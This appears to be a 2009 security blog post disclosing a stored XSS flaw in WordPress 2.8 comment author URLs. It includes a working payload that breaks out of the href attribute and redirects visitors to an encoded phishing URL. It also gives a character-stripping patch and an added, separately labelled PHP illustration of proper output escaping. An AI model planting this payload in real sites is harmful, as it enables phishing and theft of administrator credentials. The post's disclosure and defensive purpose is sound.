Wordpress 2.8 All Version Xss 0DAY

    [Sunny July 18, 2009 08:59 | by !4p47hy ]
From: vul.kr

It has been published that all versions of WordPress 2.8 suffer from an XSS flaw. Attackers can use it for phishing: they build a WordPress login page that looks exactly like your own, and if you are not careful your password is sent to the attacker's website. With your password they can edit pages and upload a webshell, so it is harmful.

How does the attacker do this?
They insert a website URL like this (in the comment form's website field):
http://www.lengmo.net'onmousemove='location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);

The URL is placed inside a single-quoted href attribute without escaping, so the quote closes the attribute and the rest becomes an onmousemove handler. If someone (or the administrator) moves the mouse over the author's website link, the browser jumps to another URL, which is a phishing page.

How can we patch it? Edit wp-comments-post.php, go to line 40 and add:
// Strip the single quote, semicolon and comma (chr(39), chr(59), chr(44))
// from the submitted author URL before it is stored and rendered.
$comment_author_url = str_replace(chr(39), '', $comment_author_url);
$comment_author_url = str_replace(chr(59), '', $comment_author_url);
$comment_author_url = str_replace(chr(44), '', $comment_author_url);
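As an added illustration (not code from the post or from WordPress), the PHP below renders a comment author link three ways: unescaped, with the character-stripping patch above, and with scheme validation plus attribute-context encoding. The input string, the helper names and the markup are constructed for this example; WordPress itself ships esc_url() and esc_attr() for the same purpose.

```php
<?php
// Constructed input modelled on the attribute breakout described in the post.
// It is not a real site; the fromCharCode digits are placeholders.
$untrusted = "http://example.com' onmousemove='location.href=String.fromCharCode(1,2,3)";

// 1. Vulnerable pattern: the value is concatenated straight into a
//    single-quoted attribute, so the embedded quote ends the href.
function render_unescaped(string $url): string {
    return "<a href='" . $url . "'>author</a>";
}

// 2. The post's patch: remove quote, semicolon and comma characters.
//    For this payload the quote can no longer close the attribute, but the
//    approach depends on guessing every character an attacker might need.
function render_blacklist(string $url): string {
    $url = str_replace(chr(39), '', $url);
    $url = str_replace(chr(59), '', $url);
    $url = str_replace(chr(44), '', $url);
    return "<a href='" . $url . "'>author</a>";
}

// 3. Defensive version: accept only http/https URLs, then encode for the
//    attribute context. ENT_QUOTES converts both ' and " so the value can
//    never terminate the attribute regardless of which quote wraps it.
function safe_comment_url(string $url): ?string {
    $url = trim($url);
    if ($url === '') {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null; // rejects javascript:, data:, and scheme-less input
    }
    return htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_escaped(string $url): string {
    $safe = safe_comment_url($url);
    if ($safe === null) {
        return 'author'; // no link at all when the URL is not acceptable
    }
    return "<a href='" . $safe . "' rel='nofollow'>author</a>";
}

echo "unescaped: ", render_unescaped($untrusted), PHP_EOL;
echo "blacklist: ", render_blacklist($untrusted), PHP_EOL;
echo "escaped:   ", render_escaped($untrusted), PHP_EOL;
echo "rejected:  ", render_escaped("javascript:void(0)"), PHP_EOL;
```

Run it with `php example.php`: the first line shows the quote closing the attribute and the handler attached; the second keeps everything inside href; the third prints the quote as `&apos;`, so the whole string stays an inert href value. Encoding at the point of output fixes the attribute context itself, which is why it holds up even when a different set of characters is used than the three the patch strips.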


Webmasters,please patch it as soon as you can.
Bug&Exp | Comments(2) | Trackbacks(0) | Reads(15741)
duyao Email Homepage
July 21, 2009 13:58
Changed my domain.
毒药's Blog
www.duyao.hk
Please help update it, thanks.
!4p47hy replied on July 21, 2009 19:41
OK ... already updated.
酷爱学习 Email Homepage
July 18, 2009 14:18
OK, I can more or less understand the English.